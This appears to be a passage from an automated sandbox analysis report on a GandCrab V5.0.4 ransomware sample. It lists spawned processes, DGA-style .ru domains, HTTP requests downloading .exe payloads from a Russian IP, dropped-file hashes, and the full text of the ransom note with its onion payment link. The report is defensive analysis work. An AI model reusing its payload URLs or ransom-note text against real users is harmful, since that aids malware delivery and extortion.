Full Path: C:\Users\user\AppData\Local\Temp\2400240831.exe
Command Line: C:\Users\user\AppData\Local\Temp\2400240831.exe
2686919881.exe, PID: 224, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\2686919881.exe
Command Line: C:\Users\user\AppData\Local\Temp\2686919881.exe
2293722122.exe, PID: 2392, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\2293722122.exe
Command Line: C:\Users\user\AppData\Local\Temp\2293722122.exe
1227434603.exe, PID: 2932, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\1227434603.exe
Command Line: C:\Users\user\AppData\Local\Temp\1227434603.exe
2673932424.exe, PID: 2396, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\2673932424.exe
Command Line: C:\Users\user\AppData\Local\Temp\2673932424.exe

Hosts

Direct IP Country Name
N 92.63.197.48 [VT] Russian Federation
Y 8.8.8.8 [VT] United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49169 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49170 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49171 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49172 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49178 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49179 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49181 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49188 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49190 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49191 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49196 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49197 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49200 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49207 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49209 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49217 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49221 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49225 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49230 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49232 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49234 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49239 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49242 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49247 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49249 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49251 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49256 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49258 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49298 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49305 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49348 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49393 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49513 92.63.197.48 slpsrgpsrhojifdij.ru 80

UDP

Source Source Port Destination Destination Port
192.168.35.21 49407 8.8.8.8 53
192.168.35.21 49793 8.8.8.8 53
192.168.35.21 50026 8.8.8.8 53
192.168.35.21 50105 8.8.8.8 53
192.168.35.21 50506 8.8.8.8 53
192.168.35.21 50603 8.8.8.8 53
192.168.35.21 51201 8.8.8.8 53
192.168.35.21 51369 8.8.8.8 53
192.168.35.21 51900 8.8.8.8 53
192.168.35.21 51910 8.8.8.8 53
192.168.35.21 51968 8.8.8.8 53
192.168.35.21 52399 8.8.8.8 53
192.168.35.21 52471 8.8.8.8 53
192.168.35.21 52956 8.8.8.8 53
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 54169 8.8.8.8 53
192.168.35.21 54941 8.8.8.8 53
192.168.35.21 55165 8.8.8.8 53
192.168.35.21 55192 8.8.8.8 53
192.168.35.21 56004 8.8.8.8 53
192.168.35.21 56514 8.8.8.8 53
192.168.35.21 56531 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 57334 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53
192.168.35.21 58453 8.8.8.8 53
192.168.35.21 59473 8.8.8.8 53
192.168.35.21 59742 8.8.8.8 53
192.168.35.21 61115 8.8.8.8 53
192.168.35.21 63030 8.8.8.8 53
192.168.35.21 63148 8.8.8.8 53
192.168.35.21 63336 8.8.8.8 53
192.168.35.21 64235 8.8.8.8 53
192.168.35.21 64292 8.8.8.8 53
192.168.35.21 64523 8.8.8.8 53
192.168.35.21 64801 8.8.8.8 53
192.168.35.21 64869 8.8.8.8 53
192.168.35.21 64891 8.8.8.8 53
192.168.35.21 64992 8.8.8.8 53
192.168.35.21 65365 8.8.8.8 53
192.168.35.21 65426 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
slpsrgpsrhojifdij.ru [VT] A 92.63.197.48 [VT]
osheoufhusheoghuesd.ru [VT] NXDOMAIN [VT]
ofheofosugusghuhush.ru [VT]
suieiusiueiuiuushgf.ru [VT]
fuiueufiiehfueghuhf.ru [VT]
sisoefjsuhuhaudhhed.ru [VT]
opllforgirsoofuhohu.ru [VT]
eooeoeooejesfiehfii.ru [VT]
oefosfishiudhiusegf.ru [VT]
aaeiauebfaneifuaeif.ru [VT]
naibfiahdiauehihhre.ru [VT]
auaeuiihaehifhahaud.ru [VT]
oieoaidhhaidhiehheg.ru [VT]
fisiuuiedesubdibesd.ru [VT]
efiiuehdiahiuediaug.ru [VT]
sfiushidhseiugiuseh.ru [VT]
oeiieieisijdingisgf.ru [VT]
aiisiaueuefiuhiehgu.ru [VT]
sfsiuhieghaughaoeho.ru [VT]
hpptlhptdkoodsokdke.ru [VT]
eneebgieeiieieiddrt.ru [VT]
eniaebivaiebifaibef.ru [VT]
mmginsiridnsinnsgir.ru [VT]
gmndaudnahgahghaohh.ru [VT]
aefaidihabevbabifba.ru [VT]
rgijirshisjriijdijh.ru [VT]
aiehazegfageigfzgei.ru [VT]
foaeodheuabguaegubr.ru [VT]
guhaohadueoanavbvbf.ru [VT]
orsodaououaebufbeob.ru [VT]
eaiiakeiohoueghoaur.ru [VT]
naiebiaifzgfaezgdzr.ru [VT]
gaeuhdobaoebuagoaoe.ru [VT]
giuahfoaoeubfouaena.ru [VT]
rgsouhdoauenodaeufb.ru [VT]
eoguaonedonaodabobg.ru [VT]
gouaondoaudbaebobgu.ru [VT]
giohuoaehdoueofbaur.ru [VT]
gnaoedoaoounauubueu.ru [VT]
gbobaebaodebuoueofu.ru [VT]
srgouosehohedohaeoh.ru [VT]

HTTP Requests

URI Data
http://slpsrgpsrhojifdij.ru/1.exe
GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/2.exe
GET /2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/3.exe
GET /3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/4.exe
GET /4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/5.exe
GET /5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://92.63.197.48/m/1.exe
GET /m/1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/2.exe
GET /m/2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/3.exe
GET /m/3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/4.exe
GET /m/4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/5.exe
GET /m/5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/1.exe
GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/2.exe
GET /2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/3.exe
GET /3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/4.exe
GET /4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/5.exe
GET /5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source Destination ICMP Type Data
192.168.35.21 8.8.8.8 3

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name winsvcs.exe
Associated Filenames
C:\Windows\5769805074060605\winsvcs.exe
File Size 144384 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 77067974a70af43a3cadf88219d1e28c
SHA1 7aa8fd4d0e0f44a4ed37f8542f7a1b0bc9faa58c
SHA256 4c0103c745fa6e173821035c304863d751bea9c073d19070d9ebf8685da95040
CRC32 9BD949DF
Ssdeep 1536:EJuqJbIXcA+Uli+SR1rJ0Fgc/7rSmOnVO1en5n/bFzhvYCvCY1AbIwLVbV56:yLJbIXjPkSgnzDHFCjbI8V
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name 1865041414.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\1865041414.exe
C:\Users\user\AppData\Local\Temp\1717238076.exe
File Size 519 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 2910f240138e190e7909b166df3698dc
SHA1 3c4ce87d71fe2ff5c5482017317105d516a8f8e0
SHA256 a4cff3dfa592efc374054229cef177964b410a8b51646aee5e2a44c6c946e2c3
CRC32 736321C4
Ssdeep 6:idqmVg3F+X32QdGRcOkctC6h1p+21/Jt/nSeUyp+El:eNGSGQdG2T6h1saJ1SeUyn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name 2841536727.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\2841536727.exe
C:\Users\user\AppData\Local\Temp\1495120250.exe
C:\Users\user\AppData\Local\Temp\2080821079.exe
C:\Users\user\AppData\Local\Temp\1674519319.exe
C:\Users\user\AppData\Local\Temp\3876917383.exe
C:\Users\user\AppData\Local\Temp\3750816931.exe
C:\Users\user\AppData\Local\Temp\4032832645.exe
C:\Users\user\AppData\Local\Temp\2459023548.exe
C:\Users\user\AppData\Local\Temp\2400240831.exe
C:\Users\user\AppData\Local\Temp\2293722122.exe
C:\Users\user\AppData\Local\Temp\2673932424.exe
File Size 519 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 1c2cd2dbb035e97cd38f9c51ce6e6b40
SHA1 bc429685689a09fbb7eac5814899425cb0fe6322
SHA256 8c20cc2cb85cf646e618be7453c6bb7e3e4837a23013c78320feec11ab7d8383
CRC32 4EF87629
Ssdeep 6:idqgHVg3F+X32r0fRtBLRaTwa/PqkYdwWTcgWtCtQUelICPLM0S+8spF:e31GSGIRtBtgPqkYd3Tc26lIC40S+8sr
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name 3751939260.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\3751939260.exe
C:\Users\user\AppData\Local\Temp\1257032286.exe
C:\Users\user\AppData\Local\Temp\3065331339.exe
C:\Users\user\AppData\Local\Temp\2810629864.exe
C:\Users\user\AppData\Local\Temp\1398632723.exe
C:\Users\user\AppData\Local\Temp\1674315261.exe
C:\Users\user\AppData\Local\Temp\3304035876.exe
C:\Users\user\AppData\Local\Temp\2686919881.exe
C:\Users\user\AppData\Local\Temp\1227434603.exe
File Size 519 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5fcf44eaa8ca2270d84ca777ca1166b9
SHA1 f57924ed272aacfcf111f2def00cee27797a81d2
SHA256 053aae9673b5a901e216224226775eec30670f2bef2ee4f5c172d89b3387a478
CRC32 E754F246
Ssdeep 6:idquvVg3F+X32wfH1Wtw4vl+t/66h1ZO6OScSM1/st8g0:e1GSGw/1WtNvEtC6h1wlScSM1ll
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name winsvcs.exe
Associated Filenames
C:\Windows\806084767800850\winsvcs.exe
File Size 539648 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 cb9d7ff8deb972b96917e88e0d56adac
SHA1 8ca2b46c42c7b413e9a24bdf2790f9260af0facf
SHA256 c2cb48209e590289e62a2e461ef9b00078b104aa359bdc02b64c695c9eb8cd27
CRC32 2161DC8B
Ssdeep 3072:G7UpE9lqoZ/WLpwsUPg7YSU2RrygKjFvwwwwwwlwwwwww2wwww4ByXrMlseFaEkX:G7V93ZeLpw1eU2RrygKFErMeeF3k
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name SFEHI-DECRYPT.txt
Associated Filenames
C:\SFEHI-DECRYPT.txt
C:\$Recycle.Bin\SFEHI-DECRYPT.txt
C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\SFEHI-DECRYPT.txt
C:\Documents and Settings\SFEHI-DECRYPT.txt
C:\Drivers\SFEHI-DECRYPT.txt
C:\Hotfix\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\x64\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\x86\SFEHI-DECRYPT.txt
C:\Hotfix\Update\SFEHI-DECRYPT.txt
C:\Hotfix\Update\x64\SFEHI-DECRYPT.txt
C:\Hotfix\Update\x86\SFEHI-DECRYPT.txt
C:\MSOCache\SFEHI-DECRYPT.txt
C:\PerfLogs\SFEHI-DECRYPT.txt
C:\PerfLogs\Admin\SFEHI-DECRYPT.txt
C:\Program Files\SFEHI-DECRYPT.txt
C:\Program Files (x86)\SFEHI-DECRYPT.txt
C:\Python27\SFEHI-DECRYPT.txt
C:\Python27\DLLs\SFEHI-DECRYPT.txt
C:\Python27\Doc\SFEHI-DECRYPT.txt
C:\Python27\include\SFEHI-DECRYPT.txt
C:\Python27\Lib\SFEHI-DECRYPT.txt
C:\Python27\Lib\bsddb\SFEHI-DECRYPT.txt
C:\Python27\Lib\bsddb\test\SFEHI-DECRYPT.txt
File Size 8610 bytes
File Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 5ade76d2778be177eaa35a40af3b9a06
SHA1 ca0af4b52b433e02a49179ee7cb0eed74dd274c9
SHA256 b5469d75562851c404bb42676114f22773089d12c0f6b040857233e372d631bb
CRC32 3F415712
Ssdeep 192:ab5hf7qDi8o84VBIT+G00hKeKU4ybMO5y4DnLj:W5hjbBtIC5eTJbMm/
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit fileDisplay Text
\xff\xfe-\x00-\x00-\x00=\x00 \x00 \x00 \x00 \x00G\x00A\x00N\x00D\x00C\x00R\x00A\x00B\x00 \x00V\x005\x00.\x000\x00.\x004\x00 \x00 \x00=\x00-\x00-\x00-\x00 \x00
\x00
\x00
\x00
\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00U\x00N\x00D\x00E\x00R\x00 \x00N\x00O\x00 \x00C\x00I\x00R\x00C\x00U\x00M\x00S\x00T\x00A\x00N\x00C\x00E\x00S\x00 \x00D\x00O\x00 \x00N\x00O\x00T\x00 \x00D\x00E\x00L\x00E\x00T\x00E\x00 \x00T\x00H\x00I\x00S\x00 \x00F\x00I\x00L\x00E\x00,\x00 \x00U\x00N\x00T\x00I\x00L\x00 \x00A\x00L\x00L\x00 \x00Y\x00O\x00U\x00R\x00 \x00D\x00A\x00T\x00A\x00 \x00I\x00S\x00 \x00R\x00E\x00C\x00O\x00V\x00E\x00R\x00E\x00D\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00*\x00
\x00
\x00
\x00
\x00	\x00*\x00*\x00*\x00*\x00*\x00F\x00A\x00I\x00L\x00I\x00N\x00G\x00 \x00T\x00O\x00 \x00D\x00O\x00 \x00S\x00O\x00,\x00 \x00W\x00I\x00L\x00L\x00 \x00R\x00E\x00S\x00U\x00L\x00T\x00 \x00I\x00N\x00 \x00Y\x00O\x00U\x00R\x00 \x00S\x00Y\x00S\x00T\x00E\x00M\x00 \x00C\x00O\x00R\x00R\x00U\x00P\x00T\x00I\x00O\x00N\x00,\x00 \x00I\x00F\x00 \x00T\x00H\x00E\x00R\x00E\x00 \x00A\x00R\x00E\x00 \x00D\x00E\x00C\x00R\x00Y\x00P\x00T\x00I\x00O\x00N\x00 \x00E\x00R\x00R\x00O\x00R\x00S\x00*\x00*\x00*\x00*\x00*\x00
\x00
\x00
\x00
\x00A\x00t\x00t\x00e\x00n\x00t\x00i\x00o\x00n\x00!\x00 \x00
\x00
\x00
\x00
\x00A\x00l\x00l\x00 \x00y\x00o\x00u\x00r\x00 \x00f\x00i\x00l\x00e\x00s\x00,\x00 \x00d\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00,\x00 \x00p\x00h\x00o\x00t\x00o\x00s\x00,\x00 \x00d\x00a\x00t\x00a\x00b\x00a\x00s\x00e\x00s\x00 \x00a\x00n\x00d\x00 \x00o\x00t\x00h\x00e\x00r\x00 \x00i\x00m\x00p\x00o\x00r\x00t\x00a\x00n\x00t\x00 \x00f\x00i\x00l\x00e\x00s\x00 \x00a\x00r\x00e\x00 \x00e\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00 \x00a\x00n\x00d\x00 \x00h\x00a\x00v\x00e\x00 \x00t\x00h\x00e\x00 \x00e\x00x\x00t\x00e\x00n\x00s\x00i\x00o\x00n\x00:\x00 \x00.\x00S\x00F\x00E\x00H\x00I\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00
\x00
\x00
\x00
\x00T\x00h\x00e\x00 \x00o\x00n\x00l\x00y\x00 \x00m\x00e\x00t\x00h\x00o\x00d\x00 \x00o\x00f\x00 \x00r\x00e\x00c\x00o\x00v\x00e\x00r\x00i\x00n\x00g\x00 \x00f\x00i\x00l\x00e\x00s\x00 \x00i\x00s\x00 \x00t\x00o\x00 \x00p\x00u\x00r\x00c\x00h\x00a\x00s\x00e\x00 \x00a\x00n\x00 \x00u\x00n\x00i\x00q\x00u\x00e\x00 \x00p\x00r\x00i\x00v\x00a\x00t\x00e\x00 \x00k\x00e\x00y\x00.\x00 \x00O\x00n\x00l\x00y\x00 \x00w\x00e\x00 \x00c\x00a\x00n\x00 \x00g\x00i\x00v\x00e\x00 \x00y\x00o\x00u\x00 \x00t\x00h\x00i\x00s\x00 \x00k\x00e\x00y\x00 \x00a\x00n\x00d\x00 \x00o\x00n\x00l\x00y\x00 \x00w\x00e\x00 \x00c\x00a\x00n\x00 \x00r\x00e\x00c\x00o\x00v\x00e\x00r\x00 \x00y\x00o\x00u\x00r\x00 \x00f\x00i\x00l\x00e\x00s\x00.\x00
\x00
\x00
\x00
\x00
\x00
\x00T\x00h\x00e\x00 \x00s\x00e\x00r\x00v\x00e\x00r\x00 \x00w\x00i\x00t\x00h\x00 \x00y\x00o\x00u\x00r\x00 \x00k\x00e\x00y\x00 \x00i\x00s\x00 \x00i\x00n\x00 \x00a\x00 \x00c\x00l\x00o\x00s\x00e\x00d\x00 \x00n\x00e\x00t\x00w\x00o\x00r\x00k\x00 \x00T\x00O\x00R\x00.\x00 \x00Y\x00o\x00u\x00 \x00c\x00a\x00n\x00 \x00g\x00e\x00t\x00 \x00t\x00h\x00e\x00r\x00e\x00 \x00b\x00y\x00 \x00t\x00h\x00e\x00 \x00f\x00o\x00l\x00l\x00o\x00w\x00i\x00n\x00g\x00 \x00w\x00a\x00y\x00s\x00:\x00
\x00
\x00
\x00
\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00
\x00
\x00
\x00
\x00|\x00 \x000\x00.\x00 \x00D\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00 \x00T\x00o\x00r\x00 \x00b\x00r\x00o\x00w\x00s\x00e\x00r\x00 \x00-\x00 \x00h\x00t\x00t\x00p\x00s\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00t\x00o\x00r\x00p\x00r\x00o\x00j\x00e\x00c\x00t\x00.\x00o\x00r\x00g\x00/\x00 \x00
\x00
\x00
\x00
\x00|\x00 \x001\x00.\x00 \x00I\x00n\x00s\x00t\x00a\x00l\x00l\x00 \x00T\x00o\x00r\x00 \x00b\x00r\x00o\x00w\x00s\x00e\x00r\x00 \x00
\x00
\x00|\x00 \x002\x00.\x00 \x00O\x00p\x00e\x00n\x00 \x00T\x00o\x00r\x00 \x00B\x00r\x00o\x00w\x00s\x00e\x00r\x00 \x00
\x00
\x00|\x00 \x003\x00.\x00 \x00O\x00p\x00e\x00n\x00 \x00l\x00i\x00n\x00k\x00 \x00i\x00n\x00 \x00T\x00O\x00R\x00 \x00b\x00r\x00o\x00w\x00s\x00e\x00r\x00:\x00 \x00 \x00 \x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00g\x00a\x00n\x00d\x00c\x00r\x00a\x00b\x00m\x00f\x00e\x006\x00m\x00n\x00e\x00f\x00.\x00o\x00n\x00i\x00o\x00n\x00/\x00f\x00b\x00c\x002\x00c\x00e\x005\x009\x00a\x004\x008\x008\x009\x00f\x009\x005\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00
\x00
\x00|\x00 \x004\x00.\x00 \x00F\x00o\x00l\x00l\x00o\x00w\x00 \x00t\x00h\x00e\x00 \x00i\x00n\x00s\x00t\x00r\x00u\x00c\x00t\x00i\x00o\x00n\x00s\x00 \x00o\x00n\x00 \x00t\x00h\x00i\x00s\x00 \x00p\x00a\x00g\x00e\x00 \x00
\x00
\x00
\x00
\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00
\x00
\x00 \x00 \x00 \x00 \x00
\x00
\x00
\x00
\x00O\x00n\x00 \x00o\x00u\x00r\x00 \x00p\x00a\x00g\x00e\x00 \x00y\x00o\x00u\x00 \x00w\x00i\x00l\x00l\x00 \x00s\x00e\x00e\x00 \x00i\x00n\x00s\x00t\x00r\x00u\x00c\x00t\x00i\x00o\x00n\x00s\x00 \x00o\x00n\x00 \x00p\x00a\x00y\x00m\x00e\x00n\x00t\x00 \x00a\x00n\x00d\x00 \x00g\x00e\x00t\x00 \x00t\x00h\x00e\x00 \x00o\x00p\x00p\x00o\x00r\x00t\x00u\x00n\x00i\x00t\x00y\x00 \x00t\x00o\x00 \x00d\x00e\x00c\x00r\x00y\x00p\x00t\x00 \x001\x00 \x00f\x00i\x00l\x00e\x00 \x00f\x00o\x00r\x00 \x00f\x00r\x00e\x00e\x00.\x00 \x00
\x00
\x00
\x00
\x00
\x00
\x00A\x00T\x00T\x00E\x00N\x00T\x00I\x00O\x00N\x00!\x00
\x00
\x00
\x00
\x00I\x00N\x00 \x00O\x00R\x00D\x00E\x00R\x00 \x00T\x00O\x00 \x00P\x00R\x00E\x00V\x00E\x00N\x00T\x00 \x00D\x00A\x00T\x00A\x00 \x00D\x00A\x00M\x00A\x00G\x00E\x00:\x00
\x00
\x00
\x00
\x00*\x00 \x00D\x00O\x00 \x00N\x00O\x00T\x00 \x00M\x00O\x00D\x00I\x00F\x00Y\x00 \x00E\x00N\x00C\x00R\x00Y\x00P\x00T\x00E\x00D\x00 \x00F\x00I\x00L\x00E\x00S\x00
\x00
\x00*\x00 \x00D\x00O\x00 \x00N\x00O\x00T\x00 \x00C\x00H\x00A\x00N\x00G\x00E\x00 \x00D\x00A\x00T\x00A\x00 \x00B\x00E\x00L\x00O\x00W\x00
\x00
\x00
\x00
\x00-\x00-\x00-\x00B\x00E\x00G\x00I\x00N\x00 \x00G\x00A\x00N\x00D\x00C\x00R\x00A\x00B\x00 \x00K\x00E\x00Y\x00-\x00-\x00-\x00
\x00
\x00l\x00A\x00Q\x00A\x00A\x00P\x00W\x00P\x00R\x008\x008\x00e\x00u\x00C\x001\x00H\x00A\x00e\x00g\x00d\x00F\x00h\x00z\x00F\x00z\x00k\x00i\x00D\x00/\x003\x00A\x00t\x00Y\x00m\x00J\x00d\x00s\x00y\x009\x00o\x00O\x00C\x00Y\x00I\x00H\x004\x00v\x00e\x00L\x00h\x00H\x00i\x00M\x00e\x00q\x000\x00T\x00k\x00r\x00U\x00d\x00/\x00s\x00B\x00Z\x008\x00u\x00Q\x00A\x00x\x003\x00a\x00/\x00V\x002\x00R\x00+\x004\x00f\x00n\x00e\x00Z\x00Q\x00a\x00E\x00R\x00T\x00P\x006\x00W\x00C\x00W\x00G\x00J\x00i\x00H\x00C\x00s\x00Q\x004\x00v\x00Q\x001\x00R\x00b\x00l\x00t\x00M\x00/\x00V\x00l\x00A\x001\x00B\x00l\x000\x00/\x00D\x00Q\x00i\x00c\x003\x00I\x00Y\x00V\x00S\x00P\x00d\x00b\x00U\x00V\x00l\x000\x00m\x003\x00v\x00h\x00C\x00p\x000\x00y\x008\x00g\x00d\x00T\x00k\x00d\x00s\x00d\x00/\x00x\x00v\x00H\x008\x00O\x00J\x00H\x00d\x00j\x00D\x00m\x00P\x007\x00f\x00f\x000\x00m\x00z\x00y\x00z\x00x\x00J\x00j\x00y\x009\x00I\x00+\x005\x00/\x00X\x00W\x00Z\x009\x00U\x008\x00c\x00E\x00o\x00j\x00b\x00J\x006\x00C\x00O\x006\x00H\x000\x00Q\x00O\x00j\x00W\x00M\x00U\x00I\x00B\x00a\x00C\x00c\x00B\x00V\x00e\x005\x005\x00b\x00r\x004\x00h\x00x\x00h\x00W\x00n\x000\x00D\x00K\x009\x004\x00+\x00V\x00j\x00Z\x00o\x00n\x00H\x00q\x00/\x00G\x00Y